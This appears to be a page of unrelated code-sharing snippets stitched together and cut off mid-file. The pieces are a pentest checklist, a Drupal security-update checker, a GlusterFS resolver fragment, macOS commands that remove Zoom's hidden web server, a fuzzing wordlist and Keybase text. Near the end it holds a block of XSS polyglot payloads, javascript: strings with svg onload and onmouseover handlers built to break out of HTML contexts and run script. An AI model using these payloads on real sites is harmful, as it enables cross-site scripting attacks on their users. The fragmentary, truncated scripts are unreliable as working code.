- Recon
- Find vuln
- Exploit
- Document it
Unicornscans in cli, nmap in msfconsole to help store loot in database.
#!/bin/bash | |
DRUPALSITES=`find /var/www -name default.settings.php | grep -i '/htdocs/' 2> "/dev/null"` | |
for site in $DRUPALSITES; do | |
value=`echo $site | sed -e "s/\/sites\/default\/default.settings.php//"` | |
echo $value | |
echo | |
DRUSHOUTPUT=`/usr/bin/php /opt/scripts/drush/drush.php --root=$value up -n 2>&1 | grep -E '(SECURITY|not supported)'` | |
echo $DRUSHOUTPUT |
#!/bin/bash | |
if [[ "$#" < "2" || "$#" > "3" ]]; then | |
cat <<END | |
Glusterfs GFID resolver -- turns a GFID into a real file path | |
Usage: $0 <brick-path> <gfid> [-q] | |
<brick-path> : the path to your glusterfs brick (required) | |
If you're using macOS, run these commands:
pkill "ZoomOpener"; rm -rf ~/.zoomus; touch ~/.zoomus && chmod 000 ~/.zoomus;
pkill "RingCentralOpener"; rm -rf ~/.ringcentralopener; touch ~/.ringcentralopener && chmod 000 ~/.ringcentralopener;
These two commands do the same thing for the two most popular "brands" of Zoom (Zoom, and RingCentral). They first kill the hidden server if it is running, and then regardless deletes it from its hidden directory if it exists there. Finally they create an empty file
# coding=utf-8 | |
# python3 | |
from urllib.parse import urlparse | |
import requests | |
import urllib3 | |
from bs4 import BeautifulSoup |
. | |
.. | |
........ | |
@ | |
* | |
*.* | |
*.*.* | |
🎠|
jaVasCript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'> | |
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*<svg/*/onload=alert()//> | |
javascript:"/*'/*`/*\" /*</title></style></textarea></noscript></noembed></template></script/--><svg/onload=/*<html/*/onmouseover=alert()//> | |
javascript:"/*\"/*`/*' /*</template></textarea></noembed></noscript></title></style></script>--><svg onload=/*<html/*/onmouseover=alert()//> | |
javascript:`//"//\"//</title></textarea></style></noscript></noembed></script></template><svg/onload='/*--><html */ onmouseover=alert()//'>` | |
javascript:`/*\"/*--><svg onload='/*</template></noembed></noscript></style></title></textarea></script><html onmouseover="/**/ alert()//'">` | |
javascript:"/*'//`//\"//</template/</title/</textarea/</style/</noscript/</noembed/</script/--><script>/<i<frame */ onload=alert()//</script> | |
javascript:"/*`/*\"/*'/*</stYle/</titLe/</teXtarEa/</nOscript>< |
I hereby claim:
To claim this, I am signing this object: